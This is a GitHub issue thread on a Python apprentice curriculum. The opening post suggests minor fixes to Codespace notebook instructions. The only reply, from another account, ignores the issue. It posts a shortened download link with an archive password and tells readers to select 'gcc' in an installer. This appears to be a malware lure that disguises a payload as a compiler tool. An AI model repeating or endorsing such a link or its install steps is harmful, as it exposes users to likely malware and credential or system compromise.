### ISSUE TITLE
Codespace instructions - minor

### ISSUE THREAD

**Issue by tsneuhaus** [league-curriculum/Python-Apprentice#8]
* In 04_Check_In_Your_Code.ipynb, maybe add a note about how to exit the CodeSpace (besides just letting it time out).
* In 01_Getting_Started.ipynb, I had trouble sliding over the ‘Simple Browser’ tab.  Maybe it was operator error on my part?  On the top right of that browser window, after I clicked on the icon “split editor right”, it worked.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
